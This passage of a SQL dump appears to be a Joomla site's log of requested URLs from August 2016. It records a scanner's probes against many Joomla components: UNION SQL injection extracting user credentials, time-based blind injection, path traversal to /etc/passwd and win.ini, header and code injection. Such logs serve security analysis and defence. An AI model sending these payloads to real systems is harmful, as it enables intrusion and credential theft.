01:39:35','0000-00-00 00:00:00'),(443,'http://www.lider-26.ru/index.php/component/OTUyNDE3/','','','',1,0,'2016-08-27 01:39:36','0000-00-00 00:00:00'),(444,'http://www.lider-26.ru/index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:39:36','0000-00-00 00:00:00'),(445,'http://www.lider-26.ru/index.php/component/users%22%20and%20%223%22%3d%223/','','','',1,0,'2016-08-27 01:39:36','0000-00-00 00:00:00'),(446,'http://www.lider-26.ru/index.php/%f0%27%27%f0%22%22/search/','','','',1,0,'2016-08-27 01:39:37','0000-00-00 00:00:00'),(447,'http://www.lider-26.ru/index.php/component/-1%27%20or%20%273%27%3d%273/','','','',1,0,'2016-08-27 01:39:38','0000-00-00 00:00:00'),(448,'http://www.lider-26.ru/index.php/component/-1%27%20or%20%273%27%3d%270/','','','',1,0,'2016-08-27 01:39:39','0000-00-00 00:00:00'),(449,'http://www.lider-26.ru/index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00','','','',1,0,'2016-08-27 01:39:39','0000-00-00 00:00:00'),(450,'http://www.lider-26.ru/index.php/component/-1%22%20or%20%223%22%3d%223/','','','',1,0,'2016-08-27 01:39:40','0000-00-00 00:00:00'),(451,'http://www.lider-26.ru/index.php/1%27%22/users/','','','',1,0,'2016-08-27 01:39:41','0000-00-00 00:00:00'),(452,'http://www.lider-26.ru/index.php/component/-1%22%20or%20%223%22%3d%220/','','','',1,0,'2016-08-27 01:39:41','0000-00-00 00:00:00'),(453,'http://www.lider-26.ru/index.php/%40%40lYI6G/users/','','','',1,0,'2016-08-27 01:39:42','0000-00-00 00:00:00'),(454,'http://www.lider-26.ru/index.php/component/users%27%20and%20sleep%284.462%29%3d%27/','','','',1,0,'2016-08-27 01:39:43','0000-00-00 00:00:00'),(455,'http://www.lider-26.ru/index.php/JyI%3d/users/','','','',1,0,'2016-08-27 01:39:44','0000-00-00 00:00:00'),(456,'http://www.lider-26.ru/index.php/component/users%27%20and%20%28sleep%284.462%29%2b1%29%20limit%201%20--%20/','','','',1,0,'2016-08-27 01:39:44','0000-00-00 00:00:00'),(457,'http://www.lider-26.ru/index.php/%bf%27%bf%22/users/','','','',1,0,'2016-08-27 01:39:45','0000-00-00 00:00:00'),(458,'http://www.lider-26.ru/index.php/component/users%22%20and%20sleep%284.462%29%3d%22/','','','',1,0,'2016-08-27 01:39:46','0000-00-00 00:00:00'),(459,'http://www.lider-26.ru/index.php/component/users%27%20or%20%28sleep%284.462%29%2b1%29%20limit%201%20--%20/','','','',1,0,'2016-08-27 01:39:49','0000-00-00 00:00:00'),(460,'http://www.lider-26.ru/index.php?option=com_clantools&squad=1+','','','',1,0,'2016-08-27 01:39:49','0000-00-00 00:00:00'),(461,'http://www.lider-26.ru/index.php/%f0%27%27%f0%22%22/users/','','','',1,0,'2016-08-27 01:39:49','0000-00-00 00:00:00'),(462,'http://www.lider-26.ru/index.php/component/users%22%20or%20%28sleep%284.462%29%2b1%29%20limit%201%20--%20/','','','',1,0,'2016-08-27 01:39:50','0000-00-00 00:00:00'),(463,'http://www.lider-26.ru/index.php/component/users%27%3dsleep%284.462%29%3d%27/','','','',1,0,'2016-08-27 01:39:51','0000-00-00 00:00:00'),(464,'http://www.lider-26.ru/index.php?option=com_clantools&task=clanwar&showgame=1+','','','',1,0,'2016-08-27 01:39:52','0000-00-00 00:00:00'),(465,'http://www.lider-26.ru/index.php/component/users%22%3dsleep%284.462%29%3d%22/','','','',1,0,'2016-08-27 01:39:53','0000-00-00 00:00:00'),(466,'http://www.lider-26.ru/index.php/component/1%27%22/','','','',1,0,'2016-08-27 01:39:53','0000-00-00 00:00:00'),(467,'http://www.lider-26.ru/index.php/component/users%27%3b%20waitfor%20delay%20%270%3a0%3a4.462%27%20--%20/','','','',1,0,'2016-08-27 01:39:53','0000-00-00 00:00:00'),(468,'http://www.lider-26.ru/index.php/component/users%22%3b%20waitfor%20delay%20%270%3a0%3a4.462%27%20--%20/','','','',1,0,'2016-08-27 01:39:55','0000-00-00 00:00:00'),(469,'http://www.lider-26.ru/index.php/component/%40%40TECRF/','','','',1,0,'2016-08-27 01:39:55','0000-00-00 00:00:00'),(470,'http://www.lider-26.ru/index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2','','','',1,0,'2016-08-27 01:39:55','0000-00-00 00:00:00'),(471,'http://www.lider-26.ru/index.php/component/JyI%3d/','','','',1,0,'2016-08-27 01:39:56','0000-00-00 00:00:00'),(472,'http://www.lider-26.ru/index.php/component/%bf%27%bf%22/','','','',1,0,'2016-08-27 01:39:57','0000-00-00 00:00:00'),(473,'http://www.lider-26.ru/index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2','','','',1,0,'2016-08-27 01:39:58','0000-00-00 00:00:00'),(474,'http://www.lider-26.ru/index.php/component/%f0%27%27%f0%22%22/','','','',1,0,'2016-08-27 01:39:58','0000-00-00 00:00:00'),(475,'http://www.lider-26.ru/index.php?option=com_photomapgallery&view=imagehandler&folder=-1OR(SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))','','','',1,0,'2016-08-27 01:40:00','0000-00-00 00:00:00'),(476,'http://www.lider-26.ru/index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=','','','',1,0,'2016-08-27 01:40:04','0000-00-00 00:00:00'),(477,'http://www.lider-26.ru/index.php?option=com_fabrik&view=table&tableid=13+union+select+1----','','','',1,0,'2016-08-27 01:40:07','0000-00-00 00:00:00'),(478,'http://www.lider-26.ru/index.php?option=com_zina&view=zina&Itemid=9','','','',1,0,'2016-08-27 01:40:19','0000-00-00 00:00:00'),(479,'http://www.lider-26.ru/index.php?option=com_ongallery&task=ft&id=-1+order+by+1--','','','',1,0,'2016-08-27 01:40:29','0000-00-00 00:00:00'),(480,'http://www.lider-26.ru/index.php?option=com_ongallery&task=ft&id=-1+union+select+1--','','','',1,0,'2016-08-27 01:40:32','0000-00-00 00:00:00'),(481,'http://www.lider-26.ru/index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:40:35','0000-00-00 00:00:00'),(482,'http://www.lider-26.ru/index.php?option=com_equipment&view=details&id=','','','',1,0,'2016-08-27 01:40:38','0000-00-00 00:00:00'),(483,'http://www.lider-26.ru/index.php?option=com_equipment&task=components&id=45&sec_men_id=','','','',1,0,'2016-08-27 01:40:41','0000-00-00 00:00:00'),(484,'http://www.lider-26.ru/index.php?option=com_amblog&view=amblog&catid=-1UNIONSELECT@@version','','','',1,0,'2016-08-27 01:40:43','0000-00-00 00:00:00'),(485,'http://www.lider-26.ru/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+j','','','',1,0,'2016-08-27 01:40:50','0000-00-00 00:00:00'),(487,'http://www.lider-26.ru/index.php?option=com_neorecruit&task=offer_view&id=','','','',1,0,'2016-08-27 01:40:53','0000-00-00 00:00:00'),(488,'http://www.lider-26.ru/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--','','','',1,0,'2016-08-27 01:41:03','0000-00-00 00:00:00'),(489,'http://www.lider-26.ru/index.php?option=com_spielothek&task=savebattle&bid=-1OR(SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))','','','',1,0,'2016-08-27 01:41:05','0000-00-00 00:00:00'),(490,'http://www.lider-26.ru/index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1OR(SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))','','','',1,0,'2016-08-27 01:41:08','0000-00-00 00:00:00'),(491,'http://www.lider-26.ru/index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1OR(SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))','','','',1,0,'2016-08-27 01:41:11','0000-00-00 00:00:00'),(492,'http://www.lider-26.ru/index.php?option=com_beamospetition&startpage=3&pet=-1','','','',1,0,'2016-08-27 01:41:13','0000-00-00 00:00:00'),(493,'http://www.lider-26.ru/index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users--','','','',1,0,'2016-08-27 01:41:16','0000-00-00 00:00:00'),(494,'http://www.lider-26.ru/index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9UNIONSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--','','','',1,0,'2016-08-27 01:41:22','0000-00-00 00:00:00'),(495,'http://www.lider-26.ru/index.php?option=com_pbbooking&task=validate&id=-1OR(SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))','','','',1,0,'2016-08-27 01:41:25','0000-00-00 00:00:00'),(496,'http://www.lider-26.ru/index.php?option=com_youtube&id_cate=4','','','',1,0,'2016-08-27 01:41:29','0000-00-00 00:00:00'),(497,'http://www.lider-26.ru/index.php?option=com_joomdle&view=detail&cat_id=1&course_id=','','','',1,0,'2016-08-27 01:41:31','0000-00-00 00:00:00'),(498,'http://www.lider-26.ru/index.php?option=com_oziogallery&Itemid=','','','',1,0,'2016-08-27 01:41:33','0000-00-00 00:00:00'),(499,'http://www.lider-26.ru/index.php?option=com_iproperty&view=agentproperties&id=','','','',1,0,'2016-08-27 01:41:36','0000-00-00 00:00:00'),(500,'http://www.lider-26.ru/index.php?option=com_huruhelpdesk&view=detail&cid[0]=','','','',1,0,'2016-08-27 01:41:43','0000-00-00 00:00:00'),(501,'http://www.lider-26.ru/index.php?option=com_staticxt&staticfile=test.php&id=1923','','','',1,0,'2016-08-27 01:41:46','0000-00-00 00:00:00'),(502,'http://www.lider-26.ru/index.php?option=com_spa&view=spa_product&cid=','','','',1,0,'2016-08-27 01:41:53','0000-00-00 00:00:00'),(503,'http://www.lider-26.ru/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube','','','',1,0,'2016-08-27 01:41:58','0000-00-00 00:00:00'),(504,'http://www.lider-26.ru/index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id=','','','',1,0,'2016-08-27 01:42:00','0000-00-00 00:00:00'),(505,'http://www.lider-26.ru/index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm=','','','',1,0,'2016-08-27 01:42:04','0000-00-00 00:00:00'),(506,'http://www.lider-26.ru//index.php?option=com_biblioteca&view=biblioteca&testo=-a%25%27UNIONSELECT1,username,password,4,5,6,7,8,9FROMjos_users%23','','','',1,0,'2016-08-27 01:42:07','0000-00-00 00:00:00'),(507,'http://www.lider-26.ru/index.php?option=com_seyret&view=','','','',1,0,'2016-08-27 01:42:10','0000-00-00 00:00:00'),(508,'http://www.lider-26.ru/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25%27UNIONSELECT1,username,password,4,5,6,7,8,9FROMjos_users%23','','','',1,0,'2016-08-27 01:42:12','0000-00-00 00:00:00'),(509,'http://www.lider-26.ru/index.php?option=com_phocagallery&view=categories&Itemid=','','','',1,0,'2016-08-27 01:42:21','0000-00-00 00:00:00'),(510,'http://www.lider-26.ru/index.php?option=com_obsuggest&controller=','','','',1,0,'2016-08-27 01:42:23','0000-00-00 00:00:00'),(511,'http://www.lider-26.ru/index.php?option=com_content&view=article&id=[AVALIDID]&Itemid=[AVALIDID]&sflaction=dir&sflDir=../../../','','','',1,0,'2016-08-27 01:42:26','0000-00-00 00:00:00'),(512,'http://www.lider-26.ru/index.php?option=com_matamko&controller=','','','',1,0,'2016-08-27 01:42:31','0000-00-00 00:00:00'),(513,'http://www.lider-26.ru/index.php?option=com_jacomment&view=','','','',1,0,'2016-08-27 01:42:33','0000-00-00 00:00:00'),(514,'http://www.lider-26.ru/index.php?option=com_qcontacts&Itemid=1','','','',1,0,'2016-08-27 01:42:34','0000-00-00 00:00:00'),(515,'http://www.lider-26.ru/index.php?option=com_qcontacts&Itemid=1%27','','','',1,0,'2016-08-27 01:42:40','0000-00-00 00:00:00'),(516,'http://www.lider-26.ru/index.php?option=com_jimtawl&Itemid=12&task=','','','',1,0,'2016-08-27 01:42:42','0000-00-00 00:00:00'),(517,'http://www.lider-26.ru/index.php?option=com_jfuploader&Itemid=','','','',1,0,'2016-08-27 01:42:45','0000-00-00 00:00:00'),(518,'http://www.lider-26.ru/index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--','','','',1,0,'2016-08-27 01:43:00','0000-00-00 00:00:00'),(519,'http://www.lider-26.ru//index.php/?option=com_question&catID=21','','','',1,0,'2016-08-27 01:43:01','0000-00-00 00:00:00'),(520,'http://www.lider-26.ru/index.php?option=com_connect&view=connect&controller=','','','',1,0,'2016-08-27 01:43:03','0000-00-00 00:00:00'),(521,'http://www.lider-26.ru/index.php?option=com_alfurqan15x&action=viewayat&surano=','','','',1,0,'2016-08-27 01:43:06','0000-00-00 00:00:00'),(522,'http://www.lider-26.ru/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13','','','',1,0,'2016-08-27 01:43:08','0000-00-00 00:00:00'),(523,'http://www.lider-26.ru/index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--','','','',1,0,'2016-08-27 01:43:11','0000-00-00 00:00:00'),(524,'http://www.lider-26.ru/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--','','','',1,0,'2016-08-27 01:43:14','0000-00-00 00:00:00'),(525,'http://www.lider-26.ru/index.php?option=com_yjcontactus&view=','','','',1,0,'2016-08-27 01:43:17','0000-00-00 00:00:00'),(526,'http://www.lider-26.ru/index.php?option=com_joomtouch&controller=','','','',1,0,'2016-08-27 01:43:22','0000-00-00 00:00:00'),(527,'http://www.lider-26.ru/index.php?search=NoGe&option=com_esearch&searchId=','','','',1,0,'2016-08-27 01:43:29','0000-00-00 00:00:00'),(528,'http://www.lider-26.ru/index.php?option=com_dioneformwizard&controller=[LFI]%00','','','',1,0,'2016-08-27 01:43:35','0000-00-00 00:00:00'),(529,'http://www.lider-26.ru/index.php?option=com_aardvertiser&cat_name=conf&task=%3C=','','','',1,0,'2016-08-27 01:43:39','0000-00-00 00:00:00'),(530,'http://www.lider-26.ru/index.php?option=com_aardvertiser&task=','','','',1,0,'2016-08-27 01:43:42','0000-00-00 00:00:00'),(531,'http://www.lider-26.ru/index.php?option=com_konsultasi&act=detail&sid=','','','',1,0,'2016-08-27 01:43:45','0000-00-00 00:00:00'),(532,'http://www.lider-26.ru/index.php?option=com_php&file=../images/phplogo.jpg','','','',1,0,'2016-08-27 01:43:47','0000-00-00 00:00:00'),(533,'http://www.lider-26.ru/index.php?option=com_php&file=../js/ie_pngfix.js','','','',1,0,'2016-08-27 01:43:49','0000-00-00 00:00:00'),(534,'http://www.lider-26.ru/index.php?option=com_php&file=../../../../../../../../../../etc/passwd','','','',1,0,'2016-08-27 01:43:51','0000-00-00 00:00:00'),(535,'http://www.lider-26.ru/index.php?option=com_articleman&task=new','','','',1,0,'2016-08-27 01:43:53','0000-00-00 00:00:00'),(536,'http://www.lider-26.ru/index.php?option=com_restaurantguide&view=country&id=69','','','',1,0,'2016-08-27 01:44:05','0000-00-00 00:00:00'),(537,'http://www.lider-26.ru/index.php?option=com_graphics&controller=','','','',1,0,'2016-08-27 01:44:08','0000-00-00 00:00:00'),(538,'http://www.lider-26.ru/index.php?option=com_restaurantguide&view=country&id=%27','','','',1,0,'2016-08-27 01:44:09','0000-00-00 00:00:00'),(539,'http://www.lider-26.ru/index.php?option=com_smartsite&controller=','','','',1,0,'2016-08-27 01:44:10','0000-00-00 00:00:00'),(540,'http://www.lider-26.ru/index.php?option=com_noticeboard&controller=','','','',1,0,'2016-08-27 01:44:12','0000-00-00 00:00:00'),(541,'http://www.lider-26.ru/index.php?option=com_ultimateportfolio&controller=','','','',1,0,'2016-08-27 01:44:13','0000-00-00 00:00:00'),(542,'http://www.lider-26.ru/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--','','http://http://www.lider-26.ru/','',1,0,'2016-08-27 01:44:18','0000-00-00 00:00:00'),(543,'http://www.lider-26.ru/index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts','','','',1,0,'2016-08-27 01:44:20','0000-00-00 00:00:00'),(544,'http://www.lider-26.ru/index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12','','','',1,0,'2016-08-27 01:44:22','0000-00-00 00:00:00'),(545,'http://www.lider-26.ru/index.php?option=com_chronocontact&itemid=1','','','',1,0,'2016-08-27 01:44:32','0000-00-00 00:00:00'),(546,'http://www.lider-26.ru/index.php?option=com_chronoconnectivity&itemid=1','','','',1,0,'2016-08-27 01:44:33','0000-00-00 00:00:00'),(547,'http://www.lider-26.ru/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=','','','',1,0,'2016-08-27 01:44:37','0000-00-00 00:00:00'),(548,'http://www.lider-26.ru/index.php?option=com_annonces&view=edit&Itemid=1','','','',1,0,'2016-08-27 01:44:39','0000-00-00 00:00:00'),(549,'http://www.lider-26.ru/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:44:47','0000-00-00 00:00:00'),(550,'http://www.lider-26.ru/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:44:50','0000-00-00 00:00:00'),(551,'http://www.lider-26.ru/index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:44:53','0000-00-00 00:00:00'),(552,'http://www.lider-26.ru/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:44:55','0000-00-00 00:00:00'),(553,'http://www.lider-26.ru/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:44:56','0000-00-00 00:00:00'),(554,'http://www.lider-26.ru/index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:44:58','0000-00-00 00:00:00'),(555,'http://www.lider-26.ru/index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:45:01','0000-00-00 00:00:00'),(556,'http://www.lider-26.ru/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:45:04','0000-00-00 00:00:00'),(557,'http://www.lider-26.ru/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:45:06','0000-00-00 00:00:00'),(558,'http://www.lider-26.ru/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1','','','',1,0,'2016-08-27 01:45:08','0000-00-00 00:00:00'),(559,'http://www.lider-26.ru/index.php?option=com_properties&task=agentlisting&aid=','','','',1,0,'2016-08-27 01:45:13','0000-00-00 00:00:00'),(560,'http://www.lider-26.ru/index.php?option=com_discussions&view=thread&catid=[CorrectCatID]&thread=-1','','','',1,0,'2016-08-27 01:45:17','0000-00-00 00:00:00'),(561,'http://www.lider-26.ru/index.php?option=com_jomdirectory&task=search&type=111+','','','',1,0,'2016-08-27 01:45:19','0000-00-00 00:00:00'),(562,'http://www.lider-26.ru/index.php?option=com_products&task=category&catid=-1','','','',1,0,'2016-08-27 01:45:22','0000-00-00 00:00:00'),(563,'http://www.lider-26.ru/index.php?option=com_products&id=-1','','','',1,0,'2016-08-27 01:45:25','0000-00-00 00:00:00'),(564,'http://www.lider-26.ru/index.php?option=com_products&catid=-1','','','',1,0,'2016-08-27 01:45:26','0000-00-00 00:00:00'),(565,'http://www.lider-26.ru/index.php?option=com_products&product_id=-1','','','',1,0,'2016-08-27 01:45:30','0000-00-00 00:00:00'),(566,'http://www.lider-26.ru/index.php?option=com_bbs&bid=-1','','','',1,0,'2016-08-27 01:45:32','0000-00-00 00:00:00'),(567,'http://www.lider-26.ru/index.php?option=com_firmy&task=section_show_set&Id=-1','','','',1,0,'2016-08-27 01:45:35','0000-00-00 00:00:00'),(568,'http://www.lider-26.ru/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1','','','',1,0,'2016-08-27 01:45:37','0000-00-00 00:00:00'),(569,'http://www.lider-26.ru/index.php?option=com_advert&id=36','','','',1,0,'2016-08-27 01:46:05','0000-00-00 00:00:00'),(570,'http://www.lider-26.ru/index.php/%26dir-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:19','0000-00-00 00:00:00'),(571,'http://www.lider-26.ru/index.php/%7cdir-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:20','0000-00-00 00:00:00'),(572,'http://www.lider-26.ru/index.php/%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:24','0000-00-00 00:00:00'),(573,'http://www.lider-26.ru/index.php/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:39','0000-00-00 00:00:00'),(574,'http://www.lider-26.ru/index.php/Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:40','0000-00-00 00:00:00'),(575,'http://www.lider-26.ru/index.php/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:41','0000-00-00 00:00:00'),(576,'http://www.lider-26.ru/index.php/-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:42','0000-00-00 00:00:00'),(577,'http://www.lider-26.ru/index.php/268435455-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:43','0000-00-00 00:00:00'),(578,'http://www.lider-26.ru/index.php/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:44','0000-00-00 00:00:00'),(579,'http://www.lider-26.ru/index.php/%e3h-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:44','0000-00-00 00:00:00'),(580,'http://www.lider-26.ru/index.php/..%c0%af-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:45','0000-00-00 00:00:00'),(581,'http://www.lider-26.ru/index.php/1e309-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:47','0000-00-00 00:00:00'),(582,'http://www.lider-26.ru/index.php/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:47','0000-00-00 00:00:00'),(583,'http://www.lider-26.ru/index.php/1some_inexistent_file_with_long_name-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:47','0000-00-00 00:00:00'),(584,'http://www.lider-26.ru/index.php/................windowswin.ini-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:48','0000-00-00 00:00:00'),(585,'http://www.lider-26.ru/index.php/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:48','0000-00-00 00:00:00'),(586,'http://www.lider-26.ru/index.php/%29-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:52','0000-00-00 00:00:00'),(587,'http://www.lider-26.ru/index.php/%21%28%28%29%26%26%21%7c*%7c*%7c-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:53','0000-00-00 00:00:00'),(588,'http://www.lider-26.ru/index.php/%5e%28%23%24%21%40%23%24%29%28%28%29%29%29******-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:54','0000-00-00 00:00:00'),(589,'http://www.lider-26.ru/index.php/9-..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:58','0000-00-00 00:00:00'),(590,'http://www.lider-26.ru/index.php/-1%27%20or%20%273%27%3d%273-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:59','0000-00-00 00:00:00'),(591,'http://www.lider-26.ru/index.php/9-%e3h/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:59','0000-00-00 00:00:00'),(592,'http://www.lider-26.ru/index.php/%24%7b%40print%28md5%28acunetix_wvs_security_test%29%29%7d-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:47:59','0000-00-00 00:00:00'),(593,'http://www.lider-26.ru/index.php/-1%27%20or%20%273%27%3d%270-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:00','0000-00-00 00:00:00'),(594,'http://www.lider-26.ru/index.php/9-..%c0%af/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:00','0000-00-00 00:00:00'),(595,'http://www.lider-26.ru/index.php/9-%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:00','0000-00-00 00:00:00'),(596,'http://www.lider-26.ru/index.php/%24%7b%40print%28md5%28acunetix_wvs_security_test%29%29%7d%5c-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:00','0000-00-00 00:00:00'),(597,'http://www.lider-26.ru/index.php/-1%22%20or%20%223%22%3d%223-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:01','0000-00-00 00:00:00'),(598,'http://www.lider-26.ru/index.php/-1%22%20or%20%223%22%3d%220-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:05','0000-00-00 00:00:00'),(599,'http://www.lider-26.ru/index.php/%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29-icetheme/image','','','',1,0,'2016-08-27 01:48:05','0000-00-00 00:00:00'),(600,'http://www.lider-26.ru/index.php/1%27%22-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:06','0000-00-00 00:00:00'),(601,'http://www.lider-26.ru/index.php/%40%40PQy8d-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:08','0000-00-00 00:00:00'),(602,'http://www.lider-26.ru/index.php/JyI%3d-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:09','0000-00-00 00:00:00'),(603,'http://www.lider-26.ru/index.php/%bf%27%bf%22-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:10','0000-00-00 00:00:00'),(604,'http://www.lider-26.ru/index.php/%f0%27%27%f0%22%22-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:11','0000-00-00 00:00:00'),(605,'http://www.lider-26.ru/index.php/9-icetheme/%e3h/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:14','0000-00-00 00:00:00'),(606,'http://www.lider-26.ru/index.php/9-icetheme/..%c0%af/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:15','0000-00-00 00:00:00'),(607,'http://www.lider-26.ru/index.php/%27%22-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:17','0000-00-00 00:00:00'),(608,'http://www.lider-26.ru/index.php/%3c%21---icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:18','0000-00-00 00:00:00'),(609,'http://www.lider-26.ru/index.php/9-icetheme/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:19','0000-00-00 00:00:00'),(610,'http://www.lider-26.ru/index.php/9-icetheme/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:22','0000-00-00 00:00:00'),(611,'http://www.lider-26.ru/index.php/9-%bf%27%bf%22/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:22','0000-00-00 